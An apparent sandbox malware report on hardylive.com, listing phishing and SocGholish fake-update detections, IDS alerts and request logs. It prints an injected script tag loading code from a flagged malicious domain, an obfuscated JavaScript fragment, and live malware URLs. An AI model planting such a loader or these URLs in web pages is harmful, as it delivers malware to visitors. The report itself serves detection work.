Edit tour

Windows Analysis Report
http://hardylive.com

Overview

General Information

Sample URL:http://hardylive.com
Analysis ID:1635542
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
Invalid 'forgot password' link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 5864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,13557621258873691069,17181680450178174728,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hardylive.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_203JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    dropped/chromecache_168JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      SourceRuleDescriptionAuthorStrings
      2.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-11T19:02:31.727916+010020601061Exploit Kit Activity Detected192.168.2.4537371.1.1.153UDP
        2025-03-11T19:02:31.728278+010020601061Exploit Kit Activity Detected192.168.2.4567771.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-11T19:02:38.103667+010020601071Exploit Kit Activity Detected192.168.2.44974746.173.214.32443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-11T19:03:24.908199+010028529001A Network Trojan was detected185.76.79.50443192.168.2.449846TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://virtual.urban-orthodontics.com/KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA==Avira URL Cloud: Label: malware
        Source: https://virtual.urban-orthodontics.com/mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LSAvira URL Cloud: Label: malware

        Phishing

        barindex
        Source: Yara matchFile source: 2.0.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_203, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_168, type: DROPPED
        Source: 0.63..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://virtual.urban-orthodontics.com/ULrfTSuYvCQ... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that downloads and executes a potentially harmful payload. The script also attempts to communicate with an unknown domain, which further increases the risk. Overall, this script exhibits a clear intent to harm and should be considered a high-risk threat.
        Source: https://virtual.urban-orthodontics.com/SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY=HTTP Parser: (function(_0x30896a,_0x11439a){var a0_0x4f49fa={_0x198556:0x5b6,_0x255c0e:0x571,_0x139ed0:'KjXS',_0x
        Source: https://hardylive.com/category/eprint/HTTP Parser: Total embedded image size: 100994
        Source: https://hardylive.com/category/eprint/HTTP Parser: Base64 decoded: <html><head></head><body><script src='https://virtual.urban-orthodontics.com/ULrfTSuYvCQ0mOV/ZonzbyPOuj1ygP0hMdS7JD7dgCs51rpvfJitb2qYuzU4zLs1ON2vJz3I/TA='></script></body></html>
        Source: https://g.adspeed.net/ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blankHTTP Parser: Found new string: script document.write('<scr'+'ipt type="text/javascript" src="https://g.adspeed.net/ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank&cb='+Math.random()+'&ref='+escape(document.referrer.substr(0,255))+'&uri='+escape(document.URL.substr(0,255))+'"></sc'+'ript>');..
        Source: https://hardylive.com/category/eprint/HTTP Parser: Title: ePrint Moorefield Examiner does not match URL
        Source: https://hardylive.com/category/eprint/HTTP Parser: Invalid link: Forgot your password?
        Source: https://hardylive.com/category/eprint/HTTP Parser: <input type="password" .../> found
        Source: https://hardylive.com/category/eprint/HTTP Parser: No favicon
        Source: https://hardylive.com/category/eprint/HTTP Parser: No <meta name="author".. found
        Source: https://hardylive.com/category/eprint/HTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 46.173.214.32:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 46.173.214.32:443 -> 192.168.2.4:49747 version: TLS 1.2

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2060107 - Severity 1 - ET EXPLOIT_KIT Malicious TA2726 TDS Domain in TLS SNI (apiexplorerzone .com) : 192.168.2.4:49747 -> 46.173.214.32:443
        Source: Network trafficSuricata IDS: 2060106 - Severity 1 - ET EXPLOIT_KIT Malicious TA2726 TDS Domain in DNS Lookup (apiexplorerzone .com) : 192.168.2.4:56777 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2060106 - Severity 1 - ET EXPLOIT_KIT Malicious TA2726 TDS Domain in DNS Lookup (apiexplorerzone .com) : 192.168.2.4:53737 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2852900 - Severity 1 - ETPRO EXPLOIT_KIT SocGholish Stage 3 Fake Update Payload M3 : 185.76.79.50:443 -> 192.168.2.4:49846
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
        Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
        Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hardylive.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hardylive.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-compiled.css?ver=56 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ajax-login-and-registration-modal-popup/skins/default/skin.css?ver=56 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/mailster/build/form/style-index.css?ver=0b25e1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/image-map-pro-wordpress/css/image-map-pro.min.css?ver=5.3.2 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/user-registration/assets/css/user-registration.css?ver=4.1.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/metorik-helper/assets/css/metorik.css?ver=2.0.9 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/brands.css?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/leaky-paywall//css/issuem-leaky-paywall.css?ver=4.21.7 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/style.css?ver=0b25e1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.27.6 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/newsletter/style.css?ver=8.7.1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/35/elementor/css/post-3.css?ver=1741370436 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.27.6 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/35/elementor/css/post-12010.css?ver=1741370437 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/css/elementor-frontend.css?ver=1.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/style.css?ver=1.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/css/darkmode.css?ver=1.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/advanced-ads/public/assets/js/advanced.min.js?ver=1.52.3 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/font/fontawesome-webfont.woff2 HTTP/1.1Host: hardylive.comConnection: keep-aliveOrigin: https://hardylive.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/img/jeg-empty.png HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.7.1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
